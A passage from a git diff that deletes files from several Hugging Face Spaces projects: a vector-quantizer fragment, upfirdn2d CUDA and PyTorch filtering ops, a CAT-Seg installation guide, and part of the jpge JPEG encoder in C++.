-torch.sum(avg_probs * torch.log(avg_probs + 1e-7), dim=-1) - ).sum() - - result["temp"] = self.curr_temp - - if self.training: - x = F.gumbel_softmax(x.float(), tau=self.curr_temp, hard=True).type_as(x) - else: - x = hard_x - - x = x.view(bsz * tsz, -1) - - vars = self.vars - if 
self.combine_groups: - vars = vars.repeat(1, self.groups, 1) - - if produce_targets: - result["targets"] = ( - x.view(bsz * tsz * self.groups, -1) - .argmax(dim=-1) - .view(bsz, tsz, self.groups) - .detach() - ) - - x = x.unsqueeze(-1) * vars - x = x.view(bsz * tsz, self.groups, self.num_vars, -1) - x = x.sum(-2) - x = x.view(bsz, tsz, -1) - - if not self.time_first: - x = x.transpose(1, 2) # BTC -> BCT - - result["x"] = x - - return result diff --git a/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp b/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp deleted file mode 100644 index 2d7177fc60040751d20e9a8da0301fa3ab64968a..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp +++ /dev/null @@ -1,103 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include <torch/extension.h> -#include <ATen/cuda/CUDAContext.h> -#include <c10/cuda/CUDAGuard.h> -#include "upfirdn2d.h" - -//------------------------------------------------------------------------ - -static torch::Tensor upfirdn2d(torch::Tensor x, torch::Tensor f, int upx, int upy, int downx, int downy, int padx0, int padx1, int pady0, int pady1, bool flip, float gain) -{ - // Validate arguments. 
- TORCH_CHECK(x.is_cuda(), "x must reside on CUDA device"); - TORCH_CHECK(f.device() == x.device(), "f must reside on the same device as x"); - TORCH_CHECK(f.dtype() == torch::kFloat, "f must be float32"); - TORCH_CHECK(x.numel() <= INT_MAX, "x is too large"); - TORCH_CHECK(f.numel() <= INT_MAX, "f is too large"); - TORCH_CHECK(x.dim() == 4, "x must be rank 4"); - TORCH_CHECK(f.dim() == 2, "f must be rank 2"); - TORCH_CHECK(f.size(0) >= 1 && f.size(1) >= 1, "f must be at least 1x1"); - TORCH_CHECK(upx >= 1 && upy >= 1, "upsampling factor must be at least 1"); - TORCH_CHECK(downx >= 1 && downy >= 1, "downsampling factor must be at least 1"); - - // Create output tensor. - const at::cuda::OptionalCUDAGuard device_guard(device_of(x)); - int outW = ((int)x.size(3) * upx + padx0 + padx1 - (int)f.size(1) + downx) / downx; - int outH = ((int)x.size(2) * upy + pady0 + pady1 - (int)f.size(0) + downy) / downy; - TORCH_CHECK(outW >= 1 && outH >= 1, "output must be at least 1x1"); - torch::Tensor y = torch::empty({x.size(0), x.size(1), outH, outW}, x.options(), x.suggest_memory_format()); - TORCH_CHECK(y.numel() <= INT_MAX, "output is too large"); - - // Initialize CUDA kernel parameters. - upfirdn2d_kernel_params p; - p.x = x.data_ptr(); - p.f = f.data_ptr(); - p.y = y.data_ptr(); - p.up = make_int2(upx, upy); - p.down = make_int2(downx, downy); - p.pad0 = make_int2(padx0, pady0); - p.flip = (flip) ? 1 : 0; - p.gain = gain; - p.inSize = make_int4((int)x.size(3), (int)x.size(2), (int)x.size(1), (int)x.size(0)); - p.inStride = make_int4((int)x.stride(3), (int)x.stride(2), (int)x.stride(1), (int)x.stride(0)); - p.filterSize = make_int2((int)f.size(1), (int)f.size(0)); - p.filterStride = make_int2((int)f.stride(1), (int)f.stride(0)); - p.outSize = make_int4((int)y.size(3), (int)y.size(2), (int)y.size(1), (int)y.size(0)); - p.outStride = make_int4((int)y.stride(3), (int)y.stride(2), (int)y.stride(1), (int)y.stride(0)); - p.sizeMajor = (p.inStride.z == 1) ? 
p.inSize.w : p.inSize.w * p.inSize.z; - p.sizeMinor = (p.inStride.z == 1) ? p.inSize.z : 1; - - // Choose CUDA kernel. - upfirdn2d_kernel_spec spec; - AT_DISPATCH_FLOATING_TYPES_AND_HALF(x.scalar_type(), "upfirdn2d_cuda", [&] - { - spec = choose_upfirdn2d_kernel<scalar_t>(p); - }); - - // Set looping options. - p.loopMajor = (p.sizeMajor - 1) / 16384 + 1; - p.loopMinor = spec.loopMinor; - p.loopX = spec.loopX; - p.launchMinor = (p.sizeMinor - 1) / p.loopMinor + 1; - p.launchMajor = (p.sizeMajor - 1) / p.loopMajor + 1; - - // Compute grid size. - dim3 blockSize, gridSize; - if (spec.tileOutW < 0) // large - { - blockSize = dim3(4, 32, 1); - gridSize = dim3( - ((p.outSize.y - 1) / blockSize.x + 1) * p.launchMinor, - (p.outSize.x - 1) / (blockSize.y * p.loopX) + 1, - p.launchMajor); - } - else // small - { - blockSize = dim3(256, 1, 1); - gridSize = dim3( - ((p.outSize.y - 1) / spec.tileOutH + 1) * p.launchMinor, - (p.outSize.x - 1) / (spec.tileOutW * p.loopX) + 1, - p.launchMajor); - } - - // Launch CUDA kernel. - void* args[] = {&p}; - AT_CUDA_CHECK(cudaLaunchKernel(spec.kernel, gridSize, blockSize, args, 0, at::cuda::getCurrentCUDAStream())); - return y; -} - -//------------------------------------------------------------------------ - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) -{ - m.def("upfirdn2d", &upfirdn2d); -} - -//------------------------------------------------------------------------ diff --git a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py b/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py deleted file mode 100644 index ecdcabbe20d2405b71d049d0bf94ae576fe58493..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py +++ /dev/null @@ -1,206 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. 
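Between the C++ binding above and the autograd wrapper that follows, it helps to see what "upfirdn" actually computes: upsample by zero-insertion, pad, apply an FIR filter, then downsample. A minimal 1-D NumPy reference (illustrative only; the real op is 2-D and the function name here is mine):

```python
import numpy as np

def upfirdn1d(x, f, up=1, down=1, pad=(0, 0)):
    """Reference 1-D upfirdn: zero-stuff, pad, FIR-filter, decimate."""
    # upsample: insert up-1 zeros between samples
    ups = np.zeros(len(x) * up)
    ups[::up] = x
    # pad both ends, then filter (np.convolve flips the kernel; for the
    # symmetric kernels used below, convolution equals correlation)
    padded = np.pad(ups, pad)
    filtered = np.convolve(padded, f, mode="valid")
    # downsample by keeping every `down`-th sample
    return filtered[::down]

x = np.array([1.0, 2.0, 3.0])
f = np.array([0.5, 0.5])            # simple averaging filter
y = upfirdn1d(x, f, up=2, down=1, pad=(0, 1))
print(y)                            # [0.5 1.  1.  1.5 1.5 0. ]
```

The output length, `(len(x)*up + pad0 + pad1 - len(f) + down) // down`, matches the `outW`/`outH` formula in the C++ validation code above (here `(3*2 + 0 + 1 - 2 + 1) // 1 = 6`).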
- -import os - -import torch -from torch.nn import functional as F -from torch.autograd import Function -from torch.utils.cpp_extension import load - - -module_path = os.path.dirname(__file__) -upfirdn2d_op = load( - "upfirdn2d", - sources=[ - os.path.join(module_path, "upfirdn2d.cpp"), - os.path.join(module_path, "upfirdn2d_kernel.cu"), - ], -) - - -class UpFirDn2dBackward(Function): - @staticmethod - def forward( - ctx, grad_output, kernel, grad_kernel, up, down, pad, g_pad, in_size, out_size - ): - - up_x, up_y = up - down_x, down_y = down - g_pad_x0, g_pad_x1, g_pad_y0, g_pad_y1 = g_pad - - grad_output = grad_output.reshape(-1, out_size[0], out_size[1], 1) - - grad_input = upfirdn2d_op.upfirdn2d( - grad_output, - grad_kernel, - down_x, - down_y, - up_x, - up_y, - g_pad_x0, - g_pad_x1, - g_pad_y0, - g_pad_y1, - ) - grad_input = grad_input.view( - in_size[0], in_size[1], in_size[2], in_size[3]) - - ctx.save_for_backward(kernel) - - pad_x0, pad_x1, pad_y0, pad_y1 = pad - - ctx.up_x = up_x - ctx.up_y = up_y - ctx.down_x = down_x - ctx.down_y = down_y - ctx.pad_x0 = pad_x0 - ctx.pad_x1 = pad_x1 - ctx.pad_y0 = pad_y0 - ctx.pad_y1 = pad_y1 - ctx.in_size = in_size - ctx.out_size = out_size - - return grad_input - - @staticmethod - def backward(ctx, gradgrad_input): - (kernel,) = ctx.saved_tensors - - gradgrad_input = gradgrad_input.reshape(-1, - ctx.in_size[2], ctx.in_size[3], 1) - - gradgrad_out = upfirdn2d_op.upfirdn2d( - gradgrad_input, - kernel, - ctx.up_x, - ctx.up_y, - ctx.down_x, - ctx.down_y, - ctx.pad_x0, - ctx.pad_x1, - ctx.pad_y0, - ctx.pad_y1, - ) - # gradgrad_out = gradgrad_out.view(ctx.in_size[0], ctx.out_size[0], ctx.out_size[1], ctx.in_size[3]) - gradgrad_out = gradgrad_out.view( - ctx.in_size[0], ctx.in_size[1], ctx.out_size[0], ctx.out_size[1] - ) - - return gradgrad_out, None, None, None, None, None, None, None, None - - -class UpFirDn2d(Function): - @staticmethod - def forward(ctx, input, kernel, up, down, pad): - up_x, up_y = up - down_x, down_y = 
down - pad_x0, pad_x1, pad_y0, pad_y1 = pad - - kernel_h, kernel_w = kernel.shape - batch, channel, in_h, in_w = input.shape - ctx.in_size = input.shape - - input = input.reshape(-1, in_h, in_w, 1) - - ctx.save_for_backward(kernel, torch.flip(kernel, [0, 1])) - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - ctx.out_size = (out_h, out_w) - - ctx.up = (up_x, up_y) - ctx.down = (down_x, down_y) - ctx.pad = (pad_x0, pad_x1, pad_y0, pad_y1) - - g_pad_x0 = kernel_w - pad_x0 - 1 - g_pad_y0 = kernel_h - pad_y0 - 1 - g_pad_x1 = in_w * up_x - out_w * down_x + pad_x0 - up_x + 1 - g_pad_y1 = in_h * up_y - out_h * down_y + pad_y0 - up_y + 1 - - ctx.g_pad = (g_pad_x0, g_pad_x1, g_pad_y0, g_pad_y1) - - out = upfirdn2d_op.upfirdn2d( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 - ) - # out = out.view(major, out_h, out_w, minor) - out = out.view(-1, channel, out_h, out_w) - - return out - - @staticmethod - def backward(ctx, grad_output): - kernel, grad_kernel = ctx.saved_tensors - - grad_input = UpFirDn2dBackward.apply( - grad_output, - kernel, - grad_kernel, - ctx.up, - ctx.down, - ctx.pad, - ctx.g_pad, - ctx.in_size, - ctx.out_size, - ) - - return grad_input, None, None, None, None - - -def upfirdn2d(input, kernel, up=1, down=1, pad=(0, 0)): - if input.device.type == "cpu": - out = upfirdn2d_native( - input, kernel, up, up, down, down, pad[0], pad[1], pad[0], pad[1] - ) - - else: - out = UpFirDn2d.apply( - input, kernel, (up, up), (down, - down), (pad[0], pad[1], pad[0], pad[1]) - ) - - return out - - -def upfirdn2d_native( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 -): - _, channel, in_h, in_w = input.shape - input = input.reshape(-1, in_h, in_w, 1) - - _, in_h, in_w, minor = input.shape - kernel_h, kernel_w = kernel.shape - - out = input.view(-1, in_h, 1, in_w, 1, minor) - out = F.pad(out, [0, 0, 0, up_x - 1, 0, 0, 0, up_y - 1]) 
- out = out.view(-1, in_h * up_y, in_w * up_x, minor) - - out = F.pad( - out, [0, 0, max(pad_x0, 0), max(pad_x1, 0), - max(pad_y0, 0), max(pad_y1, 0)] - ) - out = out[ - :, - max(-pad_y0, 0): out.shape[1] - max(-pad_y1, 0), - max(-pad_x0, 0): out.shape[2] - max(-pad_x1, 0), - :, - ] - - out = out.permute(0, 3, 1, 2) - out = out.reshape( - [-1, 1, in_h * up_y + pad_y0 + pad_y1, in_w * up_x + pad_x0 + pad_x1] - ) - w = torch.flip(kernel, [0, 1]).view(1, 1, kernel_h, kernel_w) - out = F.conv2d(out, w) - out = out.reshape( - -1, - minor, - in_h * up_y + pad_y0 + pad_y1 - kernel_h + 1, - in_w * up_x + pad_x0 + pad_x1 - kernel_w + 1, - ) - out = out.permute(0, 2, 3, 1) - out = out[:, ::down_y, ::down_x, :] - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - - return out.view(-1, channel, out_h, out_w) diff --git a/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md b/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md deleted file mode 100644 index 684c21171f6fc40b5febd995d45604643374c540..0000000000000000000000000000000000000000 --- a/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md +++ /dev/null @@ -1,20 +0,0 @@ -## Installation - -### Requirements -- Linux or macOS with Python ≥ 3.6 -- PyTorch ≥ 1.7 and [torchvision](https://github.com/pytorch/vision/) that matches the PyTorch installation. - Install them together at [pytorch.org](https://pytorch.org) to make sure of this. Note, please check - PyTorch version matches that is required by Detectron2. -- Detectron2: follow [Detectron2 installation instructions](https://detectron2.readthedocs.io/tutorials/install.html). 
-- OpenCV is optional but needed by demo and visualization -- `pip install -r requirements.txt` - -An example of installation is shown below: - -``` -git clone https://github.com/~~~/CAT-Seg.git -cd CAT-Seg -conda create -n catseg python=3.8 -conda activate catseg -pip install -r requirements.txt -``` \ No newline at end of file diff --git a/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp b/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp deleted file mode 100644 index 2e26b71ed5aad0d46478fdbcd3a880be1401f946..0000000000000000000000000000000000000000 --- a/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp +++ /dev/null @@ -1,1049 +0,0 @@ -// jpge.cpp - C++ class for JPEG compression. -// Public domain, Rich Geldreich -// v1.01, Dec. 18, 2010 - Initial release -// v1.02, Apr. 6, 2011 - Removed 2x2 ordered dither in H2V1 chroma subsampling method load_block_16_8_8(). (The rounding factor was 2, when it should have been 1. Either way, it wasn't helping.) -// v1.03, Apr. 16, 2011 - Added support for optimized Huffman code tables, optimized dynamic memory allocation down to only 1 alloc. -// Also from Alex Evans: Added RGBA support, linear memory allocator (no longer needed in v1.03). -// v1.04, May. 19, 2012: Forgot to set m_pFile ptr to NULL in cfile_stream::close(). Thanks to Owen Kaluza for reporting this bug. -// Code tweaks to fix VS2008 static code analysis warnings (all looked harmless). -// Code review revealed method load_block_16_8_8() (used for the non-default H2V1 sampling mode to downsample chroma) somehow didn't get the rounding factor fix from v1.02. 
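jpge's fixed-point color conversion (defined further down in this file) uses the constants `YR = 19595`, `YG = 38470`, `YB = 7471`, which are just the BT.601 luma weights scaled by 65536. A quick sanity check, with the constants copied from the source and the helper names mine:

```python
# jpge's fixed-point luma coefficients: BT.601 weight * 65536, rounded
YR, YG, YB = 19595, 38470, 7471

def luma_fixed(r, g, b):
    # integer path used by RGB_to_Y: scaled multiply, round via +32768, shift back
    return (r * YR + g * YG + b * YB + 32768) >> 16

def luma_float(r, g, b):
    # BT.601 luma in floating point
    return 0.299 * r + 0.587 * g + 0.114 * b

for rgb in [(0, 0, 0), (255, 255, 255), (10, 200, 60)]:
    print(rgb, luma_fixed(*rgb), round(luma_float(*rgb)))
```

Because the three coefficients sum to exactly 65536, pure white maps to exactly 255 with no drift, and arbitrary pixels land within one code value of the floating-point result.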
- -#include "jpge.h" - -#include -#include -#if PLATFORM_WINDOWS -#include -#endif - -#define JPGE_MAX(a,b) (((a)>(b))?(a):(b)) -#define JPGE_MIN(a,b) (((a)<(b))?(a):(b)) - -namespace jpge { - -static inline void *jpge_malloc(size_t nSize) { return FMemory::Malloc(nSize); } -static inline void jpge_free(void *p) { FMemory::Free(p);; } - -// Various JPEG enums and tables. -enum { M_SOF0 = 0xC0, M_DHT = 0xC4, M_SOI = 0xD8, M_EOI = 0xD9, M_SOS = 0xDA, M_DQT = 0xDB, M_APP0 = 0xE0 }; -enum { DC_LUM_CODES = 12, AC_LUM_CODES = 256, DC_CHROMA_CODES = 12, AC_CHROMA_CODES = 256, MAX_HUFF_SYMBOLS = 257, MAX_HUFF_CODESIZE = 32 }; - -static uint8 s_zag[64] = { 0,1,8,16,9,2,3,10,17,24,32,25,18,11,4,5,12,19,26,33,40,48,41,34,27,20,13,6,7,14,21,28,35,42,49,56,57,50,43,36,29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,47,55,62,63 }; -static int16 s_std_lum_quant[64] = { 16,11,12,14,12,10,16,14,13,14,18,17,16,19,24,40,26,24,22,22,24,49,35,37,29,40,58,51,61,60,57,51,56,55,64,72,92,78,64,68,87,69,55,56,80,109,81,87,95,98,103,104,103,62,77,113,121,112,100,120,92,101,103,99 }; -static int16 s_std_croma_quant[64] = { 17,18,18,24,21,24,47,26,26,47,99,66,56,66,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99 }; -static uint8 s_dc_lum_bits[17] = { 0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0 }; -static uint8 s_dc_lum_val[DC_LUM_CODES] = { 0,1,2,3,4,5,6,7,8,9,10,11 }; -static uint8 s_ac_lum_bits[17] = { 0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d }; -static uint8 s_ac_lum_val[AC_LUM_CODES] = -{ - 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, - 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, - 
0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, - 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, - 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, - 0xf9,0xfa -}; -static uint8 s_dc_chroma_bits[17] = { 0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0 }; -static uint8 s_dc_chroma_val[DC_CHROMA_CODES] = { 0,1,2,3,4,5,6,7,8,9,10,11 }; -static uint8 s_ac_chroma_bits[17] = { 0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77 }; -static uint8 s_ac_chroma_val[AC_CHROMA_CODES] = -{ - 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, - 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, - 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, - 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, - 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, - 0xf9,0xfa -}; - -// Low-level helper functions. 
-template <class T> inline void clear_obj(T &obj) { memset(&obj, 0, sizeof(obj)); } - -const int YR = 19595, YG = 38470, YB = 7471, CB_R = -11059, CB_G = -21709, CB_B = 32768, CR_R = 32768, CR_G = -27439, CR_B = -5329; -static inline uint8 clamp(int i) { if (static_cast<uint>(i) > 255U) { if (i < 0) i = 0; else if (i > 255) i = 255; } return static_cast<uint8>(i); } - -static void RGB_to_YCC(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst += 3, pSrc += 3, num_pixels--) - { - const int r = pSrc[0], g = pSrc[1], b = pSrc[2]; - pDst[0] = static_cast<uint8>((r * YR + g * YG + b * YB + 32768) >> 16); - pDst[1] = clamp(128 + ((r * CB_R + g * CB_G + b * CB_B + 32768) >> 16)); - pDst[2] = clamp(128 + ((r * CR_R + g * CR_G + b * CR_B + 32768) >> 16)); - } -} - -static void RGB_to_Y(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst++, pSrc += 3, num_pixels--) - pDst[0] = static_cast<uint8>((pSrc[0] * YR + pSrc[1] * YG + pSrc[2] * YB + 32768) >> 16); -} - -static void RGBA_to_YCC(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst += 3, pSrc += 4, num_pixels--) - { - const int r = pSrc[0], g = pSrc[1], b = pSrc[2]; - pDst[0] = static_cast<uint8>((r * YR + g * YG + b * YB + 32768) >> 16); - pDst[1] = clamp(128 + ((r * CB_R + g * CB_G + b * CB_B + 32768) >> 16)); - pDst[2] = clamp(128 + ((r * CR_R + g * CR_G + b * CR_B + 32768) >> 16)); - } -} - -static void RGBA_to_Y(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst++, pSrc += 4, num_pixels--) - pDst[0] = static_cast<uint8>((pSrc[0] * YR + pSrc[1] * YG + pSrc[2] * YB + 32768) >> 16); -} - -static void Y_to_YCC(uint8* pDst, const uint8* pSrc, int num_pixels) -{ - for( ; num_pixels; pDst += 3, pSrc++, num_pixels--) { pDst[0] = pSrc[0]; pDst[1] = 128; pDst[2] = 128; } -} - -// Forward DCT - DCT derived from jfdctint. 
-#define CONST_BITS 13 -#define ROW_BITS 2 -#define DCT_DESCALE(x, n) (((x) + (((int32)1) << ((n) - 1))) >> (n)) -#define DCT_MUL(var, c) (static_cast<int16>(var) * static_cast<int32>(c)) -#define DCT1D(s0, s1, s2, s3, s4, s5, s6, s7) \ - int32 t0 = s0 + s7, t7 = s0 - s7, t1 = s1 + s6, t6 = s1 - s6, t2 = s2 + s5, t5 = s2 - s5, t3 = s3 + s4, t4 = s3 - s4; \ - int32 t10 = t0 + t3, t13 = t0 - t3, t11 = t1 + t2, t12 = t1 - t2; \ - int32 u1 = DCT_MUL(t12 + t13, 4433); \ - s2 = u1 + DCT_MUL(t13, 6270); \ - s6 = u1 + DCT_MUL(t12, -15137); \ - u1 = t4 + t7; \ - int32 u2 = t5 + t6, u3 = t4 + t6, u4 = t5 + t7; \ - int32 z5 = DCT_MUL(u3 + u4, 9633); \ - t4 = DCT_MUL(t4, 2446); t5 = DCT_MUL(t5, 16819); \ - t6 = DCT_MUL(t6, 25172); t7 = DCT_MUL(t7, 12299); \ - u1 = DCT_MUL(u1, -7373); u2 = DCT_MUL(u2, -20995); \ - u3 = DCT_MUL(u3, -16069); u4 = DCT_MUL(u4, -3196); \ - u3 += z5; u4 += z5; \ - s0 = t10 + t11; s1 = t7 + u1 + u4; s3 = t6 + u2 + u3; s4 = t10 - t11; s5 = t5 + u2 + u4; s7 = t4 + u1 + u3; - -static void DCT2D(int32 *p) -{ - int32 c, *q = p; - for (c = 7; c >= 0; c--, q += 8) - { - int32 s0 = q[0], s1 = q[1], s2 = q[2], s3 = q[3], s4 = q[4], s5 = q[5], s6 = q[6], s7 = q[7]; - DCT1D(s0, s1, s2, s3, s4, s5, s6, s7); - q[0] = s0 << ROW_BITS; q[1] = DCT_DESCALE(s1, CONST_BITS-ROW_BITS); q[2] = DCT_DESCALE(s2, CONST_BITS-ROW_BITS); q[3] = DCT_DESCALE(s3, CONST_BITS-ROW_BITS); - q[4] = s4 << ROW_BITS; q[5] = DCT_DESCALE(s5, CONST_BITS-ROW_BITS); q[6] = DCT_DESCALE(s6, CONST_BITS-ROW_BITS); q[7] = DCT_DESCALE(s7, CONST_BITS-ROW_BITS); - } - for (q = p, c = 7; c >= 0; c--, q++) - { - int32 s0 = q[0*8], s1 = q[1*8], s2 = q[2*8], s3 = q[3*8], s4 = q[4*8], s5 = q[5*8], s6 = q[6*8], s7 = q[7*8]; - DCT1D(s0, s1, s2, s3, s4, s5, s6, s7); - q[0*8] = DCT_DESCALE(s0, ROW_BITS+3); q[1*8] = DCT_DESCALE(s1, CONST_BITS+ROW_BITS+3); q[2*8] = DCT_DESCALE(s2, CONST_BITS+ROW_BITS+3); q[3*8] = DCT_DESCALE(s3, CONST_BITS+ROW_BITS+3); - q[4*8] = DCT_DESCALE(s4, ROW_BITS+3); q[5*8] = DCT_DESCALE(s5, 
CONST_BITS+ROW_BITS+3); q[6*8] = DCT_DESCALE(s6, CONST_BITS+ROW_BITS+3); q[7*8] = DCT_DESCALE(s7, CONST_BITS+ROW_BITS+3); - } -} - -struct sym_freq { uint m_key, m_sym_index; }; - -// Radix sorts sym_freq[] array by 32-bit key m_key. Returns ptr to sorted values. -static inline sym_freq* radix_sort_syms(uint num_syms, sym_freq* pSyms0, sym_freq* pSyms1) -{ - const uint cMaxPasses = 4; - uint32 hist[256 * cMaxPasses]; clear_obj(hist); - for (uint i = 0; i < num_syms; i++) { uint freq = pSyms0[i].m_key; hist[freq & 0xFF]++; hist[256 + ((freq >> 8) & 0xFF)]++; hist[256*2 + ((freq >> 16) & 0xFF)]++; hist[256*3 + ((freq >> 24) & 0xFF)]++; } - sym_freq* pCur_syms = pSyms0, *pNew_syms = pSyms1; - uint total_passes = cMaxPasses; while ((total_passes > 1) && (num_syms == hist[(total_passes - 1) * 256])) total_passes--; - for (uint pass_shift = 0, pass = 0; pass < total_passes; pass++, pass_shift += 8) - { - const uint32* pHist = &hist[pass << 8]; - uint offsets[256], cur_ofs = 0; - for (uint i = 0; i < 256; i++) { offsets[i] = cur_ofs; cur_ofs += pHist[i]; } - for (uint i = 0; i < num_syms; i++) - pNew_syms[offsets[(pCur_syms[i].m_key >> pass_shift) & 0xFF]++] = pCur_syms[i]; - sym_freq* t = pCur_syms; pCur_syms = pNew_syms; pNew_syms = t; - } - return pCur_syms; -} - -// calculate_minimum_redundancy() originally written by: Alistair Moffat, alistair@cs.mu.oz.au, Jyrki Katajainen, jyrki@diku.dk, November 1996. 
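The in-place Moffat/Katajainen routine below computes optimal prefix-code lengths directly on the frequency array. As a cross-check, the same lengths fall out of a straightforward heap-based Huffman construction (a sketch for reference, not jpge's algorithm):

```python
import heapq

def huffman_lengths(freqs):
    """Return optimal prefix-code lengths for positive symbol frequencies."""
    # each heap entry: (subtree frequency, unique tiebreak, symbols in subtree)
    heap = [(f, i, [i]) for i, f in enumerate(freqs)]
    heapq.heapify(heap)
    lengths = [0] * len(freqs)
    tiebreak = len(freqs)
    while len(heap) > 1:
        fa, _, a = heapq.heappop(heap)
        fb, _, b = heapq.heappop(heap)
        for s in a + b:          # every symbol under the merged node gains one bit
            lengths[s] += 1
        heapq.heappush(heap, (fa + fb, tiebreak, a + b))
        tiebreak += 1
    return lengths

print(huffman_lengths([1, 1, 2, 4]))   # [3, 3, 2, 1]
```

Any valid result satisfies the Kraft equality (the lengths sum to a full binary tree), which is also what `huffman_enforce_max_code_size` below restores after clamping lengths to the JPEG limit of 16 bits.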
-static void calculate_minimum_redundancy(sym_freq *A, int n) -{ - int root, leaf, next, avbl, used, dpth; - if (n==0) return; else if (n==1) { A[0].m_key = 1; return; } - A[0].m_key += A[1].m_key; root = 0; leaf = 2; - for (next=1; next < n-1; next++) - { - if (leaf>=n || A[root].m_key<A[leaf].m_key) { A[next].m_key = A[root].m_key; A[root++].m_key = next; } else A[next].m_key = A[leaf++].m_key; - if (leaf>=n || (root<next && A[root].m_key<A[leaf].m_key)) { A[next].m_key += A[root].m_key; A[root++].m_key = next; } else A[next].m_key += A[leaf++].m_key; - } - A[n-2].m_key = 0; - for (next=n-3; next>=0; next--) A[next].m_key = A[A[next].m_key].m_key+1; - avbl = 1; used = dpth = 0; root = n-2; next = n-1; - while (avbl>0) - { - while (root>=0 && (int)A[root].m_key==dpth) { used++; root--; } - while (avbl>used) { A[next--].m_key = dpth; avbl--; } - avbl = 2*used; dpth++; used = 0; - } -} - -// Limits canonical Huffman code table's max code size to max_code_size. -static void huffman_enforce_max_code_size(int *pNum_codes, int 